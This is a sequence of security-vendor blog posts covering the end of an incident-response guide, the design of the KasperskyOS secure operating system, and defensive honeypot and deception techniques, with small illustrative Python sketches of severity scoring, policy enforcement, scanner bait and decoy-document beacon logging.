By analyzing memory dumps and hard disk dumps of compromised computers, you can get samples of malware and IOCs related to the attack. The study of these samples allows you to understand how to deal with the infection and identify the vector of the threat in order to prevent a repeat infection using a similar scenario. Dumps can be collected with the help of special software, for example, Forensic Toolkit.

Maintaining system performance

After the compromised computers are isolated, measures should be taken to maintain operation of the information system. For example, if several servers were compromised on the corporate network, changes should be made to the routing policy to redirect the workload from compromised servers to other servers.

4. Eradication

The goal of this stage is to restore the compromised information system to the state it was in before the attack. This includes removing malware and all artifacts that may have been left on the infected computers, as well as restoring the initial configuration of the information system.

There are two possible strategies to do this: a full reinstallation of the compromised device's OS, or removal of the malicious software alone. The first option is suitable for organizations that use a standard set of software for workstations, which can then be restored from a system image. Mobile phones and other devices can be reset to factory settings.

In the second case, artifacts created by malware can be detected using specialized tools and utilities. More details about this are available in the full version of our guide.

5. Recovery

At this stage, those computers that were previously compromised are reconnected to the network. The information security specialists continue to monitor the status of these machines to ensure the threat has been eliminated completely.

6. Lessons learned

Once the investigation has been completed, the information security service must submit a report with answers to the following questions:

  • When was the incident identified and who identified it?
  • What was the scale of the incident? Which objects were affected by the incident?
  • How were the Containment, Eradication, and Recovery stages executed?
  • At what stages of incident response do the actions of the information security specialists need to be corrected?

Based on this report and the information obtained during the investigation, it is necessary to develop measures to prevent similar incidents in the future. These can include changes to the security policies and configuration of corporate resources, training on information security for employees, etc. The indicators of compromise obtained during the incident response process may be used to detect other attacks of this kind in the future.

In order of priority

Troubles come in threes, or so the saying goes, and it can be the case that information security specialists have to respond to several incidents simultaneously. In this situation, it is very important to correctly set priorities and focus on the main threats as soon as possible – this will minimize the potential damage of an attack.

We recommend determining the severity of an incident based on the following factors (a toy scoring sketch follows the list):

  • Network segment where the compromised PC is located;
  • Value of data stored on the compromised computer;
  • Type and number of other incidents that affected the same PC;
  • Reliability of the indicator of compromise for the given incident.
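
One possible way to turn these factors into a working priority queue is a simple weighted score. The weights and factor encodings below are entirely our assumptions, purely for illustration:

    # Toy severity scoring; weights and factor values are our assumptions.
    SEGMENT_WEIGHT = {"ATM_subnet": 10, "servers": 8, "office": 3}

    def severity(incident):
        score = SEGMENT_WEIGHT.get(incident["segment"], 1)
        score += incident["data_value"]          # e.g. 0..10, set by data owner
        score += 2 * incident["related_incidents"]
        score *= incident["ioc_confidence"]      # 0.0..1.0, IOC reliability
        return score

    incidents = [
        {"id": 1, "segment": "office", "data_value": 2,
         "related_incidents": 0, "ioc_confidence": 0.4},
        {"id": 2, "segment": "ATM_subnet", "data_value": 9,
         "related_incidents": 3, "ioc_confidence": 0.9},
    ]
    for inc in sorted(incidents, key=severity, reverse=True):
        print(inc["id"], round(severity(inc), 1))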

It should be noted that the choice of server or network segment that should be saved first, and the choice of workstation that can be sacrificed, depends on the specifics of the organization.

If the events originating from one of the sources include an IOC published in a report on APT threats, or there is evidence of interaction with a C&C server previously used in an APT attack, we recommend dealing with those incidents first. The tools and utilities described in the full version of our Incident Response Guide can help.

Conclusion

It is impossible in one article to cover the entire arsenal that modern cybercriminals have at their disposal, describe all existing attack vectors, or develop a step-by-step guide for information security specialists to help respond to every incident. Even a series of articles would probably not be sufficient, as modern APT attacks have become extremely sophisticated and diverse. However, we hope that our recommendations about identifying incidents and responding to them will help information security specialists create a solid foundation for reliable multi-level business protection.

Features of secure OS realization https://securelist.com/features-of-secure-os-realization/77469/ https://securelist.com/features-of-secure-os-realization/77469/#comments Thu, 09 Feb 2017 12:55:01 +0000 https://kasperskycontenthub.com/securelist/?p=77469

There are generally accepted principles that developers of all secure operating systems strive to apply, but there can be completely different approaches to implementing these principles. A secure operating system can be developed from an existing OS by improving certain characteristics that are the cause (or the consequence) of that operating system’s insecure behavior, or it can be developed from scratch. The former approach has the clear advantage of lower development costs and compatibility with a broad range of software.

Let’s consider this approach in the context of systems that are part of the critical infrastructure. Two factors are important for such systems:

  • The ability to fulfil special security requirements, which may involve not only preserving certain general properties of information (such as confidentiality), but such things as tracking certain commands and data flows, having no impact on process execution in the system, etc.

  • The provision of guarantees that the system will work securely and will not be compromised.

Building a secure system based on a popular OS commonly involves implementing additional mechanisms of access control (e.g., based on the mandatory access control model), strengthened authentication, data encryption, security event auditing, and application execution control. As a rule, these are standard security measures, with the system’s special requirements addressed at the application level. As a result, special (and often also general) security measures rely on the implementation of numerous components, each of which can be compromised. Examples include: SELinux, RSBAC, AppArmor, TrustedBSD, МСВС, and Astra Linux, etc.

To improve security, tools that make it more difficult to exploit some vulnerabilities, including those inherent in the system due to its insecure original design, can be built into the system. Examples include: Grsecurity, AppArmor, Hardened Gentoo, Atlix, YANUX, and Astra Linux, etc.

Only a few years ago, a commonly used approach was to provide "security" guarantees based on scanning software code for errors and vulnerabilities and checking software integrity by comparing checksums. That approach was used in Openwall Linux and in some operating systems developed in Russia.

Although these measures lead to an overall improvement in the characteristics of general-purpose systems, they cannot address the special requirements for systems that are part of the critical infrastructure or guarantee security with a high degree of confidence.

Unlike initiatives based on attempts to improve the security of existing operating systems, KasperskyOS was designed from the start around architectural principles that ensure secure behavior meeting the requirements of special-purpose systems.

However, operating systems originally designed as secure cannot always guarantee that specific security policies will be enforced. Objective reasons for this include the difficulty of specifying clear security goals for such a relatively versatile IT product as an operating system, as well as the large number and variety of threats posed by the environment.

If an operating system is designed for specific uses on a more or less fixed range of hardware, with specific software running under it within defined operating scenarios, then security goals can be defined with sufficient accuracy and a threat model can be built. To achieve security goals, the model is used to develop a specific list of security requirements and trust requirements. Fulfilling these requirements is sufficient to guarantee the system’s secure behavior. Examples include specialized embedded solutions from LynuxWorks, Wind River, and Green Hills.

For a general-purpose operating system, achieving the same guarantees is more difficult due to a broader definition of security goals (which is necessary for the system to support a broader range of secure execution scenarios). As a rule, this requires support for a whole class of policies that are needed for a specific access control type (discretionary, mandatory, role-based), customary authentication mechanisms, and other protection tools whose management does not require specialist knowledge. This requires implementing relatively universal security mechanisms. Sometimes, provided that the OS runs on a fixed hardware platform (usually from the same vendor), compliance of these mechanisms with a certain standard or security profile can be guaranteed with a sufficient degree of confidence. Examples include: Oracle Solaris with Trusted Extensions, XTS-400, OpenVMS, and AS/400.

Finally, for a general-purpose operating system that runs on an arbitrary hardware platform, achieving high security guarantees is even harder because in this case the threat model grows out of all proportion.

This problem can be solved using an approach based on building a modular system from trusted components which are small and which implement standardized interfaces. The architecture of a secure system built in this way makes it possible to port a relatively small amount of software code to various hardware platforms and verify it, while keeping top-level modules so that they can be reused. Potentially, this makes it possible to provide security guarantees for each specific use of the OS.

The development model of the KasperskyOS operating system is based on implementing small trusted low-level components that enable top-level components to be reused. This provides maximum flexibility and efficiency in tailoring the system for the specific needs of a particular deployment, while maintaining the verifiability of its security properties.

The first step towards creating a modular operating system is using a microkernel-based architecture, in which the microkernel is the sole mediator of all interaction and data exchange in the system and can therefore provide total access control.

However, the access control provided by the microkernel alone cannot implement system properties related to supporting specific security policies. KasperskyOS therefore separates policy-based access decisions from the access control enforced at the microkernel level. Access decisions, i.e. verdicts on compliance with the security policy, are computed by a dedicated component – the security server. Flask is the best-known architecture based on this principle.

It should be noted that a number of enhanced-security operating systems (SELinux, SEBSD) based on general-purpose systems have been built using the Flask architecture, but these systems use a large monolithic kernel. In fact, Flask does not require using a microkernel, but it works best with one.

KasperskyOS does not reproduce the Flask architecture in full but develops its ideas to provide better security and flexibility of use in target systems. The original Flask architecture describes interfaces and requirements for the two main components involved in applying security policies to interaction – a security server, which computes security verdicts, and an object manager, which provides access based on these verdicts. The development of KasperskyOS is, to a large extent, focused on preserving trust not only for mechanisms that compute and apply verdicts, but also for the configuration based on which this computation is performed. Basic security policies are combined into more sophisticated rules using a configuration language. These rules are then compiled into a component that acts as an intermediary between the security server and the microkernel, enabling verdicts to be computed in a way that provides the required business logic.
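
To make the separation of verdict computation from enforcement more concrete, here is an abstract Python model of the Flask-style scheme described above. It is our illustration only: neither the class names nor the policy table correspond to KasperskyOS code or its configuration language:

    # Abstract model of Flask-style separation: the "security server" computes
    # verdicts from a policy configuration; the "kernel" only enforces them.
    POLICY = {
        # (subject, operation, object) -> allowed?
        ("net_service", "read",  "config_store"): True,
        ("net_service", "write", "config_store"): False,
    }

    class SecurityServer:
        def verdict(self, subject, operation, obj):
            # Unlisted interactions are denied by default.
            return POLICY.get((subject, operation, obj), False)

    class Microkernel:
        def __init__(self, security_server):
            self.ss = security_server

        def ipc(self, subject, operation, obj):
            # Every interaction passes through the kernel, which consults
            # the security server and merely enforces the returned verdict.
            if not self.ss.verdict(subject, operation, obj):
                raise PermissionError(f"{subject} may not {operation} {obj}")
            return "delivered"

    kernel = Microkernel(SecurityServer())
    print(kernel.ipc("net_service", "read", "config_store"))   # delivered
    # kernel.ipc("net_service", "write", "config_store")       # PermissionError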

The major architectural difference between KasperskyOS and other secure operating systems available in the market is that the former implements security policies for each specific deployment of the OS. Support for those policies which are not needed is simply not included in the system. As a result, in each deployment of the operating system the security subsystem provides only required functionality, excluding everything that is not needed.

As a result, KasperskyOS provides configuration of overall security policy parameters (system-wide configuration at the security server level) and rules for applying policies to each operation performed by each entity in the system (through configuration of verdict computation).

The trusted code obtained by compiling configurations connects application software with the security model in the system, specifying which operations performed by programs should be governed by which security policies. Importantly, the code does not include any information about operations or policies except references to them.

The architecture of KasperskyOS supports flexibility, applying policies to individual operations performed by different types of processes (without potentially jeopardizing security through possible compromise of the configuration).

Of course, a microkernel-based system with a Flask-like architecture is not an idea unique to the KasperskyOS developers. There is a history of successful microkernel development (seL4, PikeOS, Feniks/Febos), including microkernels with formally verified security properties. This work can be used to implement an OS that guarantees security domain isolation (providing "security through isolation") – an architecture known as MILS (Multiple Independent Levels of Security/Safety).

However, this case involves developing not just a microkernel but a fully-functional operating system that provides not only the separation of security domains and isolation of incompatible information processing environments, but also control of security policy compliance within these domains. Importantly, the microkernel, the infrastructure of the OS based on it and the security policies are developed by the same vendor. Using third-party work, even if it is of high quality, always imposes limitations.

KasperskyOS is based on a microkernel developed in-house, because this provides the greatest freedom in implementing the required security architecture.

The greatest shortcoming of operating systems built from scratch is the lack of support for existing software. In part, this shortcoming can be compensated for by maintaining compatibility with popular programming interfaces, the best known of which is POSIX.

This shortcoming is also successfully remedied by using virtualization. A secure operating system that can host a hypervisor for virtualizing a general-purpose OS is able to execute software written for that OS. KasperskyOS, together with Kaspersky Secure Hypervisor, provides this capability. Provided that certain conditions are met, an insecure general-purpose OS can inherit the security properties of the host OS.

KasperskyOS is built with modern trends in the development and use of operating systems in mind, in order to implement efficient, practical and secure solutions.

To summarize, the KasperskyOS secure operating system is not an extension or improvement of existing operating systems, but this does not narrow the range of its applications. The system can be used as a foundation for developing solutions that have special security requirements. Capabilities related to providing flexible and effective application execution control are inherent in the architecture of KasperskyOS. The system’s development is based on security product implementation best practices and supported by scientific and practical research.

Deceive in order to detect https://securelist.com/deceive-in-order-to-detect/76367/ https://securelist.com/deceive-in-order-to-detect/76367/#respond Thu, 19 Jan 2017 10:32:35 +0000 https://kasperskycontenthub.com/securelist/?p=76367

Interactivity is a security system feature that implies interaction with the attacker and their tools as well as an impact on the attack scenario depending on the attacker’s actions. For example, introducing junk search results to confuse the vulnerability scanners used by cybercriminals is interactive. As well as causing problems for the cybercriminals and their tools, these methods have long been used by researchers to obtain information about the fraudsters and their goals.

There is a fairly clear distinction between interactive and “offensive” protection methods. The former imply interaction with attackers in order to detect them inside the protected infrastructure, divert their attention and lead them down the wrong track. The latter may include all the above plus exploitation of vulnerabilities on the attackers’ own resources (so-called “hacking-back”). Hacking-back is not only against the law in many countries (unless the defending side is a state organization carrying out law enforcement activities) it may also endanger third parties, such as users’ computers compromised by cybercriminals.

The use of interactive protection methods that don’t break the law and that can be used in an organization’s existing IT security processes make it possible not only to discover if there is an intruder inside the infrastructure but also to create a threat profile.

One such approach is Threat Deception – a set of methods, specialized solutions and processes that have long been used by researchers to analyze threats. In our opinion, this approach can also be used to protect valuable data inside the corporate network from targeted attacks.

Characteristics of targeted attacks

Despite the abundance of technology and specialized solutions to protect corporate networks, information security incidents continue to occur even in large organizations that invest lots of money to secure their information systems.

Part of the reason for these incidents is the fact that the architecture of automated security solutions, based on identifying patterns in general traffic flows or monitoring a huge number of endpoints, will sooner or later fail to recognize an unknown threat or a criminal stealing valuable data from the infrastructure. This may occur, for example, if the attacker has studied the specific features of a corporate security system in advance and identified a way of stealing valuable data that will go unnoticed by security solutions and will be lost among the legitimate operations of other users.

Another reason is that APT attacks differ from other types of attack: in terms of target selection and pinpoint execution they resemble surgical strikes rather than the blanket bombing of mass attacks.

The organizers of targeted attacks carefully study the targeted infrastructure, identifying gaps in configuration and vulnerabilities that can be exploited during an attack. With the right budget, an attacker can even deploy the products and solutions that are installed in the targeted corporate network on a testbed. Any vulnerabilities or flaws identified in the configuration may be unique to a specific victim.

This allows cybercriminals to go undetected on the network and steal valuable data for long periods of time.

To protect against an APT, it is necessary not only to combat the attacker's tools (utilities for analyzing security status, malicious code, etc.) but also to use the attacker's characteristic behavior on the corporate network to promptly detect their presence and prevent any negative consequences of their actions. Despite the fact that the attacker usually has enough funds to thoroughly examine the victim's corporate network, the defending side still has the main advantage: full physical access to its network resources. It can use this to create its own rules on its own territory for hiding valuable data and detecting an intruder.

After all, “locks only keep an honest person honest,” but with a motivated cybercriminal a lock alone is not enough – a watchdog is required to notify the owner about a thief before he has time to steal something.

Interactive games with an attacker

In our opinion, in addition to the obligatory conventional methods and technologies to protect valuable corporate information, the defensive side needs to build interactive security systems in order to get new sources of information about the attacker who, for one reason or another, has been detected inside the protected corporate network.

Interactivity in a security system implies a reaction to the attacker's actions. That reaction may be, for instance, the addition of the attacker's resources to a blacklist (e.g., the IP addresses of the workstations from which the attack is carried out) or the isolation of compromised workstations from other network resources. An attacker looking for valuable data within a corporate network may be deliberately misled, or the tools used by the attacker, such as vulnerability scanners, may be tricked into leading them in the wrong direction.

Let’s assume that the defending side has figured out all the possible scenarios where the corporate network can be compromised and sets traps on the protected resource:

  • a special tool capable of deceiving automated vulnerability scanners by introducing all sorts of "junk" (information about non-existent services or vulnerabilities, etc.) into their reports (a minimal sketch of such a tool follows the list);
  • a web scenario containing a vulnerability that, when exploited, leads the attacker to the next trap (described below);
  • a pre-prepared section of the web resource that imitates the administration panel and contains fake documents.
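
Here is the promised sketch of the first trap: a toy web endpoint that advertises a deliberately "vulnerable-looking" server banner and invents plausible paths, so that automated scanners fill their reports with junk. This is purely our illustration; real deception tools are far more elaborate:

    import random
    from http.server import BaseHTTPRequestHandler, HTTPServer

    FAKE_PATHS = ["/admin.bak", "/old/login.php", "/backup.sql", "/cgi-bin/test"]

    class BaitHandler(BaseHTTPRequestHandler):
        server_version = "Apache/1.3.26"   # fabricated, outdated-looking banner
        sys_version = ""

        def do_GET(self):
            # Pretend every probed path exists and link to more fake ones,
            # so a directory scanner keeps finding "results".
            body = "".join(f'<a href="{p}">{p}</a>'
                           for p in random.sample(FAKE_PATHS, 2))
            data = body.encode()
            self.send_response(200)
            self.send_header("Content-Type", "text/html")
            self.send_header("Content-Length", str(len(data)))
            self.end_headers()
            self.wfile.write(data)

    if __name__ == "__main__":
        HTTPServer(("0.0.0.0", 8081), BaitHandler).serve_forever()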

How can these traps help?

Below is a simple scenario showing how a resource with no special security measures can be compromised:

  1. The attacker uses a vulnerability scanner to find a vulnerability on the server side of the protected infrastructure, for example, the ability to perform an SQL injection in a web application.
  2. The attacker successfully exploits this vulnerability on the server side and gains access to the closed zone of the web resource (the administration panel).
  3. The attacker uses the gained privileges to study the inventory of available resources, finds documents intended for internal use only and downloads them.

Let’s consider the same scenario in the context of a corporate network where the valuable data is protected using an interactive system:

  1. The attacker searches for vulnerabilities on the server side of the protected infrastructure using automated means (vulnerability scanner and directory scanner). Because the defending side has pre-deployed a special tool to deceive scanning tools, the attacker has to spend time analyzing the scan results, after which the attacker finds a vulnerability – the trap on the server side of the protected infrastructure.
  2. The attacker successfully exploits the detected vulnerability and gains access to the closed zone of the web resource (the administration panel). The attempt to exploit the vulnerability is recorded in the log file, and a notification is sent to the security service team.
  3. The attacker uses the gained privileges to study the inventory of available resources, finds the fake documents and downloads them.
  4. The downloaded documents contain scripts that call the servers controlled by the defending side. The parameters of the call (source of the request, time, etc.) are recorded in the log file. This information can then be used for attacker attribution (what type of information they are interested in, where the workstations used in the attack are located, the subnets, etc.) and to investigate the incident (a minimal sketch of such a beacon listener follows the list).
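
Below is the promised sketch of a listener for "canary" call-homes from fake documents. The /beacon path, port and log format are our assumptions; the decoy documents would be prepared to request such a URL when opened:

    import logging
    from http.server import BaseHTTPRequestHandler, HTTPServer

    logging.basicConfig(filename="deception.log", level=logging.INFO,
                        format="%(asctime)s %(message)s")

    class BeaconHandler(BaseHTTPRequestHandler):
        def do_GET(self):
            if self.path.startswith("/beacon"):
                # Record who opened the decoy document, from where and when.
                logging.info("decoy opened: src=%s path=%s ua=%s",
                             self.client_address[0], self.path,
                             self.headers.get("User-Agent", "-"))
            self.send_response(204)  # empty response, nothing to reveal
            self.end_headers()

    if __name__ == "__main__":
        HTTPServer(("0.0.0.0", 8080), BeaconHandler).serve_forever()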

Detecting an attack by deceiving the attacker

Currently, in order to strengthen protection of corporate networks the so-called Threat Deception approach is used. The term ‘deception’ comes from the military sphere, where it refers to a combination of measures aimed at misleading the enemy about one’s presence, location, actions and intentions. In IT security, the objective of this interactive system of protection is to detect an intruder inside the corporate network, identifying their attributes and ultimately removing them from the protected infrastructure.

The threat deception approach involves the implementation of interactive protection systems based on the deployment of traps (honeypots) in the corporate network and on exploiting specific features of the attacker's behavior. In most cases, honeypots are set up to divert the attacker's attention from the truly valuable corporate resources (servers, workstations, databases, files, etc.). The use of traps also makes it possible to collect information about any interaction between the attacker and the resource (the time interactions occur, the types of data attracting the attacker's attention, the toolset used by the attacker, etc.).

However, it’s often the case that a poorly deployed trap inside a corporate network will not only be successfully detected and bypassed by the attackers but can serve as an entry point to genuine workstations and servers containing valuable information.


Incorrect implementation of a honeypot in the corporate network can be likened to building a small house next to a larger building containing valuable data. The smaller house is unlikely to divert the attention of the attacker; they will know where the valuable information is and where to look for the “key” to access it.

Simply installing and configuring honeypots is not enough to effectively combat cybercriminals; a more nuanced approach to developing scenarios to detect targeted attacks is required. At the very least, it is necessary to carry out an expert evaluation of the attacker’s potential actions, to set honeypots so that the attacker cannot determine which resources (workstations, files on workstations and servers, etc.) are traps and which are not, and to have a plan for dealing with the detected activity.


Correct implementation of traps and a rapid response to any events related to them make it possible to build an infrastructure where almost any attacker will lose their way (fail to find the protected information and reveal their presence).

Forewarned is forearmed

Getting information about a cybercriminal in the corporate network enables the defending side to take measures to protect their valuable data and eliminate the threat:

  • to send the attacker in the wrong direction (e.g., to a dedicated subnet), concealing valuable resources from their field of view and obtaining additional information about the attacker and their tools that can be used in further investigation of the incident;
  • to identify compromised resources and take all necessary measures to eliminate the threat (e.g., to isolate infected workstations from the rest of the resources on the corporate network);
  • to reconstruct the chronology of actions and movements of the attacker inside the corporate network and to define the entry points so that they can be eliminated.

Conclusion

The attacker has an advantage over the defender, because they have the ability to thoroughly examine their victim before carrying out an attack. The victim doesn’t know where the attack will come from or what the attacker is interested in, and so has to protect against all possible attack scenarios, which requires a significant amount of time and resources.

Implementation of the Threat Deception approach gives the defending side an additional source of information on threats thanks to resource traps. The approach also minimizes the advantage enjoyed by the attacker due to both the early detection of their activity and the information obtained about their profile that enables timely measures to be taken to protect valuable data. It is not necessary to use prohibited “offensive security” methods, which could make the situation worse for the defending side if law enforcement agencies get involved in investigating the incident.

Interactive security measures that are based on deceiving the attacker will only gain in popularity as the number of incidents in the corporate and public sector increases. Soon, systems based on the Threat Deception approach will become not just a tool of the researchers but an integral part of a protected infrastructure and yet another source of information about incidents for security services.

